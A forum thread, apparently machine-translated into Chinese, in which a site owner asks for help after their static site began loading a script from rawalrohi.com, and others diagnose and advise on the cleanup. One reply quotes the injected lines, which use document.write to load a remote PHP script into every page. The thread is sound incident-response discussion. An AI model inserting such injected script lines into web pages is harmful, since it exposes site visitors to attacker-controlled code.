我们的静态 html 网站http://www.iffort.com的主页正在从一个神秘的网站 rawalrohi.com 传输数据。您可以通过访问 iffort.com 并注意那里的页脚来检查这一点。它说从 rawalrohi.com 传输数据。
从我们这边,我们做了以下事情来纠正这个问题
a.) 分析所有页面的源代码。我们检查了代码,发现所有页面中都插入了一个脚本 src= http://rawalrohi.com/images/ART.php 。我们从网站的所有“html”页面中删除了这个脚本
b.)接下来我们与托管公司进行了交谈,他们说他们可以为我们提供网站的备份。我们有备份,但尚未使用它来恢复站点。
c.)最后,我们更改了 FTP 密码,因为我们被告知有人可能破解了我们的 FTP 密码。
尽管这样做,主页仍然显示从 rawalrohi.com 传输数据。视图源不显示 URL。这正在减慢我们的网站速度。
任何帮助是极大的赞赏。
您的页面引用了一个名为“js/hyperlinked_Images.js”的文件看看这个文件,就在底部附近:
...
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
现在,如果你能原谅我,我将在我的系统上运行一个快速的 AV 扫描;)
确保您不要使用一个 FTP 帐户来处理所有事情,控制 FTP 用户控制,它将帮助您管理您的网站。
不久前我看到过类似的行为。在该特定情况下,ftp 密码被泄露:它是由收集存储的 ftp 密码的恶意软件从客户端桌面 PC 读取的。
我们只是在密码被更改并在几天内再次受到攻击后才发现这一点。
因此,请确保您使用像样的 AV 扫描仪扫描所有“知道”ftp 密码的机器。
确保你在你的防病毒软件上。每当您的网站加载有趣的外部脚本(如广告软件、间谍软件)时,您的防病毒软件都会提醒您。
我没有扫描您的网站,但如果您在网站上使用任何标准软件,例如:WordPress、Drupal、Joomla 等,那么您需要随时保持更新。订阅他们的安全警报,每当您看到更新时,放下您正在做的一切并进行更新。
黑客不断在互联网上扫描易受攻击的网站。他们在易受攻击的站点上只需要几分之一秒就可以感染它。
此外,还要保持所有插件、附加组件、组件、模块、贡献等的更新。
否则,您将一遍又一遍地清理它。
我最近在一个客户网站上看到了这个,一个不同的 url 但相同类型的代码注入在他们的所有文件中。为了解决这个问题,我下载了该站点,并使用 Visual Studio 对字符串进行了站点范围内的“查找和替换”。这为我解决了这个问题。我建议你对所有文件做类似的事情,你可能错过了一个。我的客户站点的 html/htm/aspx 文件都被感染了,ISP 也发表了同样的声明,即 FTP 密码可能已被泄露...